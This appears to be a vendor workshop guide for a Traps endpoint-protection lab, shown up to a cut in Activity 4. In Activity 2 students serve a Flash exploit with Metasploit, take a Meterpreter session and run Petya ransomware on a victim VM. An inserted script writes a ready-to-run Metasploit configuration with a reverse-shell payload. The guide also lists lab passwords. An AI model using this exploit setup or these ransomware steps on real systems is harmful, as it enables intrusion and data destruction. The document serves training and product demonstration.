
Ultimate Test Drive - Advanced Endpoint Protection

ULTIMATE
TEST DRIVE:
Advanced Endpoint Protection

Workshop Guide

UTD-AEP 3.1 © 2019 Palo Alto Networks, Inc. | Confidential and Proprietary 20190822

Table of Contents

Activity 1 - Initiate the UTD Workshop 5


Task 1 – Log in to Your UTD Class Environment 5
Task 2 - Understand the UTD Environment Setup 6
Task 3 - Adjust Display as Necessary 8
Task 4 – Enabling the Firewall 9
Task 5 – Rename Traps Client VMs 12

Activity 2 - Conduct a Ransomware Attack 14


Task 1 - Understand the Attack Sequence 14
Task 2 - Prepare the Drive-By Download 15
Task 3 - Activate the Spear Phishing Email 16
Task 4 - Upload the Ransomware to Victim VM 18
Task 5 - Run Ransomware Malware on Victim 20
Task 6 – Revert Victim VM 22

Activity 3 – Install Traps Agents 24


Task 1 – Install Traps on Traps-Win1 24
Task 2 – Install Traps on Traps-Win2 25

Activity 4 - Explore the Traps Management Service 27


Task 1 - Access the Traps Management Service 27
Task 2 – Administer the Traps Management Service 29
Task 3 – Manage Endpoint Policy 35
Task 4 – Security Events 36

Activity 5 - Prevent Exploit Attack 39


Task 1 - Attempt Ransomware Attack 39
Task 2 – Review Traps Management Service 43

Activity 6 - Prevent Malware Attack 46


Task 1 – Review Policy Rules and Profiles 46
Task 2 - Attempt to Execute Ransomware 48
Task 3 - Create Unknown Malware 52
Task 4 - Attempt to Run Ransomware Again 53
Task 5 – Attempt to Run Ransomware from Restricted Directory 58


Activity 7 - Security Operating Platform in Action 62


Task 1 - Review the Security Operating Platform 62
Task 2 - Review Ransomware Attack Progression 62
Task 3 - Retrieve Ransomware Through Firewall 64

Activity 8 – Anti-Ransomware Protection 66


Task 1 – Review Anti-Ransomware Protection Module 66
Task 2 – Execute Ransomware on Victim 66
Task 3 – Attempt Execution of Ransomware on Traps Client 67

Activity 9 – Microsoft Office File Protection 71


Task 1 – Review Microsoft Office File Protection 71
Task 2 – Prepare Attacker system 71
Task 3 – Attempt Execution of Known Malicious Macro 72
Task 4 – Generate Unknown Malicious Macro 75

Activity 10 – Behavioral Threat Protection 78


Task 1 – Review Behavioral Threat Protection 78
Task 2 – Attempt Execution of Script-based Attack 78

Activity 11 – Traps on Linux 82


Task 1 – Execute Kernel Privilege Escalation on Linux 82
Task 2 – Install Traps on Traps-Linux 83
Task 3 – Attempt Execution of Kernel Privilege Escalation on Linux with Traps Agent 84

Activity 12 - Complete the UTD Evaluation 87


How to use this guide


The activities outlined in this Ultimate Test Drive (UTD) Workshop Guide are meant to contain all the
information necessary to navigate the workshop interface, complete the workshop activities, and troubleshoot
any potential issues with the UTD environment. This guide is meant to be used in conjunction with the
information and guidance provided by your facilitator.

Note: This workshop covers only basic topics and is not a substitute for training classes conducted by
Palo Alto Networks Authorized Training Centers (ATC). Please contact your partner or regional sales
manager for more information on available training and how to register for one near you.


Activity 1 - Initiate the UTD Workshop


In this activity, you will:
• Log in to the Ultimate Test Drive Workshop from your laptop
• Understand the layout of the environment and its various components
• Enable the Firewall to facilitate connectivity

Task 1 – Log in to Your UTD Class Environment


Step 1: Confirm System Requirements
Verify that your laptop has a modern browser with HTML5 support. We recommend the latest version of Firefox
or Chrome.

Step 2: Navigate to Class URL


Open a browser window and navigate to the class URL. If you have an invitation email, you can find the Class
URL and Passphrase in the invitation email. Otherwise, your instructor will provide you with the class URL and
Passphrase.

Enter your email address and the Passphrase.

Step 3: Log in to the UTD Environment


Complete the Registration form and click “Login” at the bottom.

Step 4: Enter the UTD Environment


Once you have successfully logged in, the system will automatically create a unique UTD environment for
you. Please note that this process may take a while, as indicated by the progress bar on top of the screen.


Once the environment has been created, the system will display a welcome page. Click “Go to my VM List” to
begin using the environment.

This will display a list of all virtual systems that constitute the UTD environment.
Take note of the “Shortcut Menu” at the top of your browser window. You will use this Shortcut Menu
throughout the workshop to switch between the available desktops.

Task 2 - Understand the UTD Environment Setup


The UTD environment consists of the following components:
A. Attacker: a Kali Linux virtual machine that hosts the Metasploit Framework, a penetration testing tool. You
will use it to play the attacker in the workshop exercises.
B. TMS: the Traps management service (TMS), the administrative back end for Traps. You will use it to view
Traps settings and logs during the exercises.
C. Traps-Win1 & Traps-Win2: Windows 7 virtual systems on which most of the exercises are carried out. They
run the Traps agent, which you install in Activity 3.
D. Traps-Linux: an Ubuntu Linux virtual system. It runs the Traps agent, which you install in Activity 11.
E. Victim: identical to the Windows 7 Traps clients with one exception: it has no Traps agent. It is the target
of the ransomware attack in this workshop.
F. VM-Series Security Platform: a Palo Alto Networks virtual next-generation firewall.


Task 3 - Adjust Display as Necessary


In this Task, you will learn how to adjust the CloudShare display to suit your preferences.

Step 1. Access the Traps-Win1 Desktop


In your browser, click the “Traps-Win1” tab on the Shortcut Menu that lists the available desktop environments
in the UTD. This will connect you to “Traps-Win1” through your browser.

Step 2. Modify Screen Dimensions


If the “Student Desktop” resolution is too high or too low for your laptop display, you can adjust the resolution
from the left-hand pane. You can also click the “Full screen” icon to maximize the display.


Note: By default, the desktops in this UTD are RDP sessions rendered in your browser by an HTML5 client, so
an HTML5-capable browser is required.

If you encounter connection issues with any of the desktop interfaces, click the “Reconnect” link in the left-
hand pane of the desktop display to re-establish your connection.

If reconnection to the environment remains unsuccessful, please inform the instructor for further assistance.

Task 4 – Enabling the Firewall


Step 1. Access the Traps-Win1 Desktop
In your browser, click the “Traps-Win1” tab on the Shortcut Menu that lists the available desktop environments
in the UTD. This will connect you to the “Traps-Win1” desktop.


Step 2. Log in to the Firewall Interface


Launch the Chrome browser on “Traps-Win1”. If the page does not automatically open, click the “NGFW”
bookmark located on the Favorites bar directly below the address bar of the browser.
The firewall’s management interface presents a self-signed certificate, so Chrome shows a certificate warning.
In this isolated lab, accept it by clicking “Advanced” and then “Proceed to 10.30.21.1 (unsafe)”. In a production
deployment you would install a certificate from a trusted CA on the management interface rather than train
users to click through this warning. The firewall authentication prompt then appears.
Use the following credentials to log in to the Firewall:
Name: student
Password: utd135

This logs you in to the firewall and displays the main dashboard.
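Clicking through the certificate warning is fine in this isolated lab, but a practitioner would rather verify the firewall’s self-signed certificate out of band once and then pin it. The following shell functions are an added example (not part of the workshop or of any Palo Alto Networks tooling) of trust-on-first-use pinning with openssl: fetch the leaf certificate from 10.30.21.1 over a path you trust, store its SHA-256 fingerprint, and compare the live certificate against that value before each later login. The file names are assumptions.

```shell
#!/bin/sh
# Added example (not from the workshop): trust-on-first-use pinning for the
# firewall's self-signed management certificate. Record the certificate's
# SHA-256 fingerprint once over a path you trust, then compare the live
# certificate against it before every login instead of clicking "Proceed".

# fetch_cert <host> <port> -> leaf certificate in PEM form on stdout
fetch_cert() {
    openssl s_client -connect "$1:$2" -servername "$1" </dev/null 2>/dev/null \
        | openssl x509
}

# pem_fingerprint <pem-file> -> SHA-256 fingerprint, colon-separated, upper-case
pem_fingerprint() {
    openssl x509 -in "$1" -noout -fingerprint -sha256 \
        | cut -d= -f2 | tr 'a-f' 'A-F'
}

# check_pin <pem-file> <pin-file> -> 0 if the fingerprint matches the pinned
# value, 1 otherwise (including an unreadable or missing certificate)
check_pin() {
    have="$(pem_fingerprint "$1")"
    want="$(tr 'a-f' 'A-F' < "$2" | tr -d ' \n\r')"
    [ -n "$have" ] && [ "$have" = "$want" ]
}

# Lab usage (10.30.21.1 is the firewall from the guide; file names assumed):
#   first time, from a trusted path:
#     fetch_cert 10.30.21.1 443 > ngfw.pem && pem_fingerprint ngfw.pem > ngfw.pin
#   before each later login:
#     sh pin_check.sh 10.30.21.1 443 ngfw.pin
if [ "$#" -eq 3 ]; then
    live="$(mktemp)"
    fetch_cert "$1" "$2" > "$live"
    if check_pin "$live" "$3"; then
        echo "certificate matches pin for $1"; rm -f "$live"
    else
        echo "PIN MISMATCH for $1: do not log in"; rm -f "$live"; exit 1
    fi
fi
```

A mismatch means either the firewall’s certificate was legitimately regenerated or something is intercepting the management connection; in both cases the right response is to re-verify the fingerprint out of band, not to click “Proceed”.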

Step 3. Enable Firewall Interface “ethernet1/1”


Click the “Network” tab, then click the “Interfaces” node on the left-hand side. This will display all the interfaces
configured for the firewall.

Click the interface “ethernet1/1” under the “Ethernet” tab. This will display the configuration dialog box.


Click the “Advanced” tab and select “up” in the “Link State” drop-down to the right of the dialog box; then click
“OK” to return to the network interface listing.

Click “Commit” in the upper right-hand corner of the dashboard.

This will display a confirmation pop-up. Click “Commit” in the pop-up window to confirm your choice. This will
display the Commit Status dialog box containing a progress bar.
Once the process has completed, click “Close” in the pop-up window to return to the network interface listing.
The “Link Status” of “ethernet1/1” has turned green now that the interface is up.


Step 4. Verify Internet Connectivity


Open a new tab in the browser window and confirm Internet connectivity by visiting https://www.google.com.

(Only the App-ID “google-base” is allowed by the firewall’s security policy; other web sites are blocked, so
failing to reach a different site is expected and does not indicate a connectivity problem.)

Once you have verified internet connectivity, close the browser by clicking the “X” in the top-right corner of the
browser’s application window.

Task 5 – Rename Traps Client VMs


This UTD shares a single Traps management service between all students, and each student’s VMs are exact
copies of every other student’s, so they all start with the same host names. Traps agents appear in TMS by
host name, so to find your own clients and their security events you will rename your Traps client VMs to
something unique to you. For example, if your name is “John Doe”, use the base name “jdoe”.

Step 1. Access the Traps-Win1 Desktop


In your browser, click the “Traps-Win1” tab on the Shortcut Menu.

Step 2. Rename Traps-Win1


Double-click the desktop shortcut “Rename this computer” to bring up the “System Properties” panel.
Click the “Change” button to bring up the “Computer Name/Domain Changes” window. Note: editing the
“Computer description” field on the System Properties panel does not change the host name; you must click
“Change”.
Change the “Computer name:” from “traps-win1” to your “basename-win1”. For example, John Doe would use
“jdoe-win1”.
Click “OK”.
In the new “Computer Name/Domain Changes” pop-up window, click “OK”.
Click “Close” in the “System Properties” panel.
When prompted, click “Restart Now”. It will take 2-3 minutes for the VM to reboot. If you are not prompted to
restart, make sure you clicked the “Change” button.
Click the “Reconnect” button after enough time has been given for the VM to reboot. You should be logged
back in to the desktop.
Double-click the bginfo shortcut on the desktop. You should see your new host name in the upper right-hand
corner of the screen.

Step 3. Access the Traps-Win2 Desktop


In your browser, click the “Traps-Win2” tab on the Shortcut Menu.


Step 4. Rename Traps-Win2


Double-click the desktop shortcut, “Rename this computer” to bring up the “System Properties” panel.
Click the “Change” button to bring up the “Computer Name/Domain Changes” window.
Change the “Computer name:” from “traps-win2” to your “basename-win2”. For example, John Doe would be
“jdoe-win2”.
Click “OK”.
In the new “Computer Name/Domain Changes” pop-up window, click “OK”.
Click “Close” in the “System Properties” panel.
When prompted, click “Restart Now”. It will take a few minutes for the VM to reboot.
Click the “Reconnect” button after enough time has been given for the VM to reboot. You should be logged
back in to the desktop.
Double-click the bginfo shortcut on the desktop. You should see your new host name in the upper right-hand
corner of the screen.

Step 5. Access the Traps-Linux Console


In your browser, click the “Traps-Linux” tab on the Shortcut Menu.
Click in the Console and press “Enter”. You may ignore any CIFS-related messages.

Step 6. Rename Traps-Linux


Type “hostname” in the console to see the current host name of “traps-linux”.
Type “sudo ./change_host.sh” and enter the password of “Password1!” when prompted.
Using your base name, (e.g. jdoe), type “basename-linux” for the new host name.
Type “hostname” to confirm the change was made.

End of Activity 1


Activity 2 - Conduct a Ransomware Attack

In this Activity, you will:


• Become the attacker and launch a ransomware attack on a victim via a drive-by download, take
control of the victim machine, and upload and run ransomware on it
• Experience a spear phishing attack as the victim and witness first-hand the breach of your
endpoint system

Task 1 - Understand the Attack Sequence


In this activity, you will assume the role of the Attacker and prepare and launch your ransomware attack
against a victim machine. As a prerequisite, you must understand how the attack compromises the victim
machine in this demonstration.
This ransomware attack involves two main stages:
1. Compromise endpoint via exploit
2. Deliver ransomware malware

To complete the first stage, you will use the Metasploit Framework on the Attacker workstation to set up a web
server that delivers an exploit to the victim. When the victim clicks a link in a phishing email, he or she is
redirected to the Attacker’s web site, where a Flash Player use-after-free exploit (CVE-2015-5119, leaked in the
2015 Hacking Team breach and a zero-day at the time) compromises the victim’s endpoint.
Once the victim’s system is compromised, the Attacker uploads the ransomware to the victim’s machine and
executes it. This process is depicted in the figure below.


Task 2 - Prepare the Drive-By Download


In this task, you will configure the Attacker system to serve the Hacking Team Flash exploit to the victim when
the victim requests the web page linked from the phishing email.

Step 1. Access the Attacker Desktop


Click the “Attacker” link on the Shortcut Menu that lists the available desktop environments in the UTD.

Step 2. Launch the Metasploit Listener


In the terminal window, type the following command at the prompt and press the “enter/return” key:
./demo.sh
This will load Metasploit, configure it to listen for incoming connections, and serve the Hacking Team Flash
zero-day exploit to the victim system. This process may take a while, so please be patient.
When Metasploit has completed loading, it should display the following prompt:
“msf exploit(adobe_flash_hacking_team_uaf) >”
The attacker system is now ready and online, waiting for a connection from the victim system.

Note: If using a non-US keyboard layout, you may use the “Virtual Keyboard” in the left-hand pane to send
text.
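The guide does not show what demo.sh contains. As an added illustration (not the workshop’s own script), the following shell snippet writes and runs a Metasploit resource file that does what the text describes: select the exploit/multi/browser/adobe_flash_hacking_team_uaf module (the module named in the prompt above), pair it with a Meterpreter reverse-TCP payload, and start the exploit server as a background job. The attacker address 192.0.2.10 and the ports are placeholders; the real lab values are whatever demo.sh sets.

```shell
#!/bin/sh
# Added example, not the workshop's demo.sh: build a Metasploit resource
# file (one msfconsole command per line) for the Hacking Team Flash UAF
# browser exploit and run it. Addresses and ports are placeholders.

# write_msf_rc <rc-path> <attacker-ip> <web-port>
# Serves the exploit on http://<attacker-ip>:<web-port>/ and catches the
# Meterpreter callback on <attacker-ip>:4444. ExitOnSession=false keeps the
# exploit server up after the first victim connects, so several browsers
# can be phished with the same listener.
write_msf_rc() {
    rc="$1"; lhost="$2"; srvport="$3"
    cat > "$rc" <<EOF
use exploit/multi/browser/adobe_flash_hacking_team_uaf
set SRVHOST $lhost
set SRVPORT $srvport
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT 4444
set ExitOnSession false
exploit -j
EOF
}

# rc_option <rc-path> <OPTION> -> value set for OPTION, empty if absent
rc_option() {
    sed -n "s/^set $2 //p" "$1"
}

# rc_module <rc-path> -> module selected by the 'use' line
rc_module() {
    sed -n 's/^use //p' "$1"
}

# Write the resource file and start msfconsole only if it is installed,
# so the script is harmless on a machine without Metasploit.
main() {
    rc="${TMPDIR:-/tmp}/flash_uaf.rc"
    write_msf_rc "$rc" "192.0.2.10" 8080
    if command -v msfconsole >/dev/null 2>&1; then
        # -q: no banner; -r: run the resource file, then leave the console open
        msfconsole -q -r "$rc"
        return
    fi
    echo "msfconsole not installed; resource file written to $rc"
}

main
```

When the victim’s browser requests the URL, the console logs the request, serves the SWF and reports a new Meterpreter session, which is what you see in Task 4. From the network side, the SWF download and the reverse-TCP callback to LPORT are the two observable events a firewall or IPS in the path can act on.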


Task 3 - Activate the Spear Phishing Email


In this task, you take on the role of the victim. We assume that you (as the victim) have received a spear
phishing email from the attacker, which includes a link to the attacker’s listener service that you configured in
the previous Task. You happily click the link and activate the next stage of the attack.

Step 1. Access the Victim Desktop


Click the “Victim” link on the Shortcut Menu that lists the available desktop environments in the UTD.

Note: You should not need the credentials for the user associated with the Victim VM. However, if the
system does present you with a login screen on the Victim VM, click the icon associated with the user
“Jen” and supply the password associated with that user (shown above the desktop display area). This
password is “Password1”.


Step 2. Launch Outlook and Access the Spear Phishing Email


Microsoft Outlook is already open and running on the desktop. An email with the subject line: “Someone has
your password” is selected and displayed in the preview pane.
Click the link “Review Your Devices Now” in the email. This will open Internet Explorer, and after a small delay
(depending on your network speed), display a webpage that resembles the Google account login page.

At this point, the attacker has already compromised the endpoint.


Task 4 - Upload the Ransomware to Victim VM


As noted in Step 2 of the previous Task, the Victim was compromised as soon as the content served from the
Attacker system began to render in the browser. In this Task, you return to the role of the Attacker, upload
your ransomware to the Victim, and infect the machine.

Step 1. Access the Attacker Desktop


Click the tab that is associated with the Attacker environment.
Notice that the Metasploit listener service received a request, sent a SWF file in reply, and opened a
“Meterpreter” session to the Victim Client.

Click inside the Terminal window that is open on the desktop. Then, press the “enter/return” key a few times to
get a new Metasploit prompt.

Note: If your connection to the Attacker desktop has been severed, click the “Reconnect” link in the left-
hand pane of the desktop display area to re-establish your connection to that environment.
If you see the lock screen, click in that window and hit the Enter/Return key to get a login prompt.

Step 2. Verify Open Session to Victim


In the Terminal window on the Attacker’s desktop, type the following command to verify that you have an
active Meterpreter session to the Victim system:
sessions
This will display a list of all active sessions currently running within Metasploit.


An open session indicates that the Attacker has an active, direct connection to the Victim, which he or she can
use to further compromise the system.
Note the “ID” of the active session connected to the Victim. This is the “Session ID” that you will need to enter
in the next step; it should be session #1, although that might not be the case if you refreshed the browser on
the Victim desktop at any point.

Step 3. Initiate an Interactive Session with the Victim


Initiate an interactive session with the Victim by entering the following command at the Metasploit prompt (if
the “Session ID” you noted in the previous step was not “1”, substitute your “Session ID” for the number “1” in
this command):
sessions -i 1
This will initiate the interactive session, display the message “Starting interaction with 1,” and change the
prompt to a Meterpreter prompt: “meterpreter>”
At this point, you have connected to the Victim and can execute any number of available commands to exploit
the system. To see a list of available commands, simply type “?” and press “enter/return” at the Meterpreter
prompt.
We will not explore the available Meterpreter commands in this exercise, but feel free to scroll up and down
the list to see the available commands. These include commands such as: reboot, shutdown, and
keyscan_start (a keylogger), among others.

Step 4. Upload the Ransomware to the Victim


The Petya ransomware that is part of this attack sequence already resides on the Attacker machine. Upload it
to the Victim by typing the following commands at the Meterpreter prompt:
cd /Windows
upload happy.exe


At this point, Meterpreter should display a message confirming that it successfully uploaded “happy.exe” to the
Victim Client: “uploaded : happy.exe -> happy.exe”

We are now ready to launch our ransomware attack and infect the Victim.

Task 5 - Run Ransomware Malware on Victim


For this Task, you must be prepared to quickly switch over to the tab for the Victim as soon as you have
launched the ransomware malware. This malware acts very quickly to infect a system, and if you remain in the
Attacker environment, you will miss its actions.

Step 1. Execute the Ransomware Malware on the Victim Machine


Be prepared to switch to the tab for the Victim as soon as you enter the following command at the Meterpreter
prompt (in the Attacker Terminal window):
execute -f happy.exe -H

Step 2. Witness the Ransomware Infect the Victim Machine


At this point, you should have quickly switched over to the tab for the Victim. Once the ransomware malware
begins executing on the Victim machine, it will simulate a “blue screen of death” that typically accompanies a
Windows system crash and reboot the Victim.


After the reboot, the ransomware’s own boot code displays a fake CHKDSK screen while it encrypts the NTFS
Master File Table; the progress counter never completes.
Click the “Send ctrl+alt+delete” button in the left-hand pane of the Victim desktop display to send that key
sequence to the system.

This will display a flashing red and grey “skull and cross bone” image and prompts the user to “PRESS ANY
KEY.”

Click inside the “skull and cross bone” image and press the space bar. This should change the image to a
ransomware warning page, with demands and instructions to submit your payment in order to unlock your
system.


Congratulations! You are simultaneously an attacker and your own victim.

Step 3. Close the Attacker Session


On the Attacker desktop, click inside the Terminal window and press the “enter/return” key a few times to
display a Metasploit prompt.

We no longer need this attacker session, so type the following command to shut down Meterpreter:
exit
This will return you to the Metasploit prompt. Type the following command to shut down Metasploit as well.
exit
This will stop the attacker server and return you to the Terminal prompt.

Task 6 – Revert Victim VM


Petya has overwritten the Victim VM’s master boot record with its own boot code and encrypted the NTFS
Master File Table, so the system can no longer boot normally. Revert the VM to its original snapshot, as you will
use it again in a later Activity.
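Reverting the snapshot is the right remedy here, because restoring the original boot sector alone would not undo the MFT encryption. As an added example (not part of the workshop), the following shell functions show the check a responder would run from a Linux analysis host against the victim’s exported disk image or device: hash the first 512-byte sector and compare it with a baseline recorded before the incident. A changed MBR hash is a quick indicator that boot code was replaced. The 1 MiB sample image and the paths are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the workshop): baseline and re-check the first
# 512-byte sector (the MBR) of a disk device or image. Petya replaces the
# MBR with its own boot code; a changed hash is a quick indicator that boot
# code was tampered with. Run from an analysis host against the victim's
# disk image (e.g. an exported VM disk), not on the infected Windows guest.

# mbr_hash <device-or-image> -> SHA-256 of the first 512 bytes
mbr_hash() {
    dd if="$1" bs=512 count=1 2>/dev/null | sha256sum | cut -d' ' -f1
}

# mbr_baseline <device-or-image> <baseline-file>: record the current hash
mbr_baseline() {
    mbr_hash "$1" > "$2"
}

# mbr_check <device-or-image> <baseline-file> -> 0 if the MBR is unchanged,
# 1 if it differs from the recorded baseline
mbr_check() {
    [ "$(mbr_hash "$1")" = "$(cat "$2")" ]
}

# Demo on a constructed 1 MiB image so the script runs without root or a
# real disk: baseline a clean "MBR", then overwrite its boot-code area.
demo() {
    img="${TMPDIR:-/tmp}/fake_disk.img"
    base="${TMPDIR:-/tmp}/fake_disk.mbr.sha256"
    dd if=/dev/zero of="$img" bs=1024 count=1024 2>/dev/null
    # 0x55AA boot signature at offset 510, as a real MBR carries
    printf '\125\252' | dd of="$img" bs=1 seek=510 conv=notrunc 2>/dev/null
    mbr_baseline "$img" "$base"
    mbr_check "$img" "$base" && echo "MBR unchanged (baseline recorded)"
    # a bootkit rewrites the 440-byte boot-code area; simulate that
    dd if=/dev/urandom of="$img" bs=1 count=440 conv=notrunc 2>/dev/null
    mbr_check "$img" "$base" || echo "MBR changed: boot code replaced, investigate"
}

demo
```

On a real fleet the baseline is taken at provisioning time and stored off the host, since a bootkit that controls the disk can also rewrite a baseline kept on it.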

Step 1. Access the Virtual Machine List


From the “Shortcut Menu” at the top of the browser, click “VM List”. Note that the “VM List” tab is to the right
and you might need to click the right arrow icon to scroll over to it.


This page will show all the available VMs.

Step 2. Revert Victim Client


Scroll down to find the “Victim” VM and click “Revert” from the drop-down.

Click “Revert VM” to start the revert process. This should take 5-10 minutes.

Please continue to the next Activity while this process is happening.

End of Activity 2


Activity 3 – Install Traps Agents

In this activity, you will:


• Install Traps Agent on Windows

Task 1 – Install Traps on Traps-Win1


In this Task, you will install the Traps Agent on the Traps-Win1 environment and verify that Traps is running.

Step 1. Access the Traps-Win1 Desktop


Click the “Traps-Win1” tab to display that environment.

Step 2. Install Traps Agent


Double-click the “Install Traps” icon on the desktop to launch the Traps Agent installer.

Click “Next”.

Check the box for “I accept the terms in the License Agreement” and then click “Next”.

Click “Install” and wait for the installer to complete.

Click “Finish” when done. You may notice some Action Center alerts in the System Tray due to Traps
registering itself with Windows.


Step 3. Open Traps Agent Console


Double-click the icon in the System Tray to open the Traps Agent console.

Traps is installed, connected and enabled.

Task 2 – Install Traps on Traps-Win2


In this Task, you will install the Traps Agent on the Traps-Win2 environment and verify that Traps is running.

Step 1. Access the Traps-Win2 Desktop


Click the “Traps-Win2” tab to display that environment.

Step 2. Install Traps Agent


Double-click the “Install Traps” icon on the desktop to launch the Traps Agent installer.

Click “Next”.

Check the box for “I accept the terms in the License Agreement” and then click “Next”.

Click “Install” and wait for the installer to complete.


Click “Finish” when done. You may notice some Action Center alerts in the System Tray due to Traps
registering itself with Windows.

Step 3. Open Traps Agent Console


Double-click the icon in the System Tray to open the Traps Agent console.

Traps is installed, connected and enabled. Note that “Anti-Exploit Protection” is disabled on this system. This
is a result of the “Policy Rules” applied to this endpoint. It may take a little time for the endpoint to have the
assigned policies pushed out. Instead of waiting, move to the next Task, as you will revisit this
endpoint later.


Activity 4 - Explore the Traps Management Service

In this activity, you will:


• Access the Traps management service (TMS)
• Explore the administrative functions of Traps management service

Task 1 - Access the Traps Management Service


In this Task, you will access the Traps management service environment, a cloud-based security
infrastructure service that is designed to minimize the operational challenges associated with protecting your
endpoints. From the Traps management service, you can manage the endpoint security policy, review security
events as they occur, and perform additional analysis of associated logs.

Step 1. Access Traps Management Service


In your browser, click the “TMS” tab on the Shortcut Menu. This will connect you to a Windows desktop with a
browser already running and connected to the Traps management service tenant.

If the browser is not running, double-click the “Traps management service” icon on the desktop.


Step 2. Log in to Traps Management Service


Click the “Login” link to be redirected to the login page.

Click “LOGIN” on the Single Sign On page to be logged in with the supplied credentials.

Note: The Traps management service allows the use of role-based access controls. As the
TMS you are using is shared among all classes and students, you will be using an account
assigned with the Viewer role. This account has read-only access.
Screenshots shown in this workshop guide will be from the default Super Admin role. What
you see with the Viewer role may be different from the screenshots.


Task 2 – Administer the Traps Management Service


In this Task, you will review the administrative functions provided by the Traps management service.

Step 1. Review Dashboard


Once you log in, you should be taken to the Dashboard. The Dashboard widgets display general information
about the Traps management service and link to filtered views by endpoint characteristic.

• Unresolved Security Events – Shows number of unresolved security events by the severity level of the
event and links to a filtered list of unresolved events by the severity that you select. By default, this chart
displays data from the last 30 days. Use the Events Time drop-down to change the data collection period.
• Platforms – Displays the total number of registered agents and the distribution of agents by platform. Also
provides links to filtered lists of endpoints for each platform.
• License – Displays information about your Traps management service license including the license
expiration date and the number of license seats that are currently allocated. To review all licensed
endpoints (excludes endpoints with Zombie or Unlicensed status), click the statistic about number of seats
used.
• Content Version – Displays the distribution of agents by content version and links to a filtered list of
endpoints on the latest or an outdated content version.
After a new content update is released, agents receive it gradually as they check in with the Traps
management service.


Step 2. Review Agent Installations


Select the “Endpoints” > “Agent Installations” node.

These installation packages were created in advance. The Windows package is the one you installed on
Traps-Win1 and Traps-Win2 in Activity 3; the Linux package is used in Activity 11. The macOS and Android
installers are shown as examples and are not used in this workshop.
If an “Agent Version” is highlighted in orange, a newer installer is available.

Step 3. Review Endpoints


Select the “Endpoints” > “Endpoints” node.

This is the list of all registered endpoints. The list can be filtered using the drop-down boxes at the top of the
page. You can search for your installed endpoints by entering the base name you previously used for
“Endpoint Name”.
Note that the Windows endpoints show a green “TS” icon which indicates these were installed as a
“Temporary session” endpoint type. Other endpoint types include “Standard” as indicated by your Linux client,
“Virtual desktop infrastructure (VDI)” and Mobile.


Note: An administrator can perform the following actions from the Endpoints page. Except where noted, the
Viewer role you are using cannot.

• Retrieve Endpoint Data from selected endpoints
• Retrieve specific files from selected endpoints
• Initiate malware scanning on selected endpoints (Windows only)
• Abort scanning on selected endpoints (Windows only)
• Upgrade Traps on selected endpoints
• Export data to a CSV file (available to the Viewer role)
• Delete endpoints
• Uninstall

Click your traps-win1 endpoint (e.g., jdoe-win1) in the list to bring up additional details about that client.

Note in the screenshot above that from an individual endpoint you can:

• Retrieve endpoint data
• Retrieve files
• Initiate Live Terminal (Windows only; allows you to manage the endpoint remotely)
• Scan now
• Isolate endpoint (halts all network access on the endpoint except the agent’s own communication with Traps)


Click on the “Policy” tab to review the assigned policies and scanning report.

Step 4. Review Endpoint Groups


Select the “Endpoints” > “Endpoint Groups” node.

To apply policy rules to specific endpoints easily, you can define endpoint groups, which can be static or
dynamic. A dynamic group is defined by one or more criteria.
Hover the cursor over “TrapsWin1group” and click the pencil icon to review the criterion that defines this
group (the IPv4 address 192.168.21.221).


Step 5. Review Actions Tracker


Select the “Monitor” > “Actions Tracker” node to monitor the progress of administrator-initiated activities.

The “Actions Tracker” tracks the following activities:
• Agent upgrades
• Agent uninstalls
• Agent scans
• Halted agent scans
• Data retrieval (both security event data and tech support files)
• Quarantined file restoration

Additional details are available by clicking on the activity.


Step 6. Review Logs


Select the “Monitor” > “Logs” node to monitor endpoint and server logs.

Endpoint logs display entries for events monitored by the Traps agent. Server logs display entries for changes
to the Traps management service.

Step 7. Review Reports


Select the “Monitor” > “Reports” node to view previously created reports.

Admins may also create a new on-demand report or schedule reports on a daily, weekly or monthly basis to
be emailed.


Task 3 – Manage Endpoint Policy


In this Task, you will review the endpoint policy functions provided by the Traps management service.

Step 1. Review Profiles


Select the “Security” > “Profiles” node to view the Profiles available to Windows, macOS, Linux and Android.

The Traps management service provides default security profiles that you can use out of the box to begin
protecting your endpoints from threats immediately. While security rules enable you to block or allow files to
run on your endpoints, security profiles help you customize and reuse settings across different groups of
endpoints.
• Exploit – Exploit profiles block attempts to exploit flaws in browsers and in the operating system.
For example, Exploit profiles help protect against exploit kits, illegal code execution, and other attempts to
exploit process and system vulnerabilities. Exploit profiles are supported for Windows, Mac, and Linux
platforms.
• Malware – Malware profiles protect against the execution of malware including trojans, viruses, worms,
and grayware. Malware profiles serve two main purposes: to define how to treat behavior common to
malware such as ransomware or script-based attacks, and to define how to treat known malware and
unknown files. Malware profiles are supported for all platforms.
• Restriction – Restriction profiles limit where executables can run on the endpoint. For example, you can
restrict files from running from specific local folders or from removable media. Restriction profiles are
supported for Windows platforms.
• Agent Settings – Agent Settings profiles enable you to customize settings that apply to the Traps app,
such as the disk space quota for log retention. For Mac and Windows platforms, you can also customize
user interface options for the Traps console such as accessibility and notifications.

Click on a Profile name to further explore the details for a given profile.
Note: Additional Profiles have been created for this workshop. Most of them disable certain functionality in
order to demonstrate the individual methods of Traps' multi-method prevention capabilities one at a time.


Step 2. Review Policy Rules


Select the “Security” > “Policy Rules” node to view the assigned Profiles based on operating system type.

The Traps management service provides out-of-the-box protection for all registered endpoints with a default
security policy for each type of platform. To fine-tune your security policy, you customize settings in a security
profile and attach that profile to a policy rule. Each policy rule that you create must apply to one or more
endpoints, endpoint groups, or Active Directory (AD) objects.
As seen here, the Endpoint Groups previously defined have your Profiles assigned. These Profiles, assigned
by Endpoint Group, should also be shown under Endpoints > traps-win1 > Policy.

Task 4 – Security Events


In this Task, you will review security events provided by the Traps management service.

Step 1. Review Security Events


Select the “Security” > “Security Events” node.

A security event occurs when the Traps agent identifies an attempt to run a malicious file or process. Traps
agents report security events when the file or process matches your applied policy rules (either default policy
rules or custom rules you define). When the event occurs, Traps applies the action specified in the applied
security profile: either block the malicious activity, or allow it and report it.


The Traps management service ranks all events in order of severity so you can quickly and easily see the
most important events when you log in to the Traps management service. You can then drill down into the
security events to determine if a security event is a real threat and, if so, you can remediate it. In some cases,
you may determine that a security event does not pose a real threat and can create an exception for it.
Click a Security Event to get additional details, WildFire verdicts, any defined Exceptions, Comments and
History.

Note that the Status can be changed from New to Investigating or Closed as your assessment of the event
progresses.

Step 2. Review Files


Select the “Security” > “Files” node.

Each time a file attempts to run on a Mac or Windows endpoint, Traps logs the event and reports it to the
Traps management service. The Files page in the Traps management service displays all the files that run on
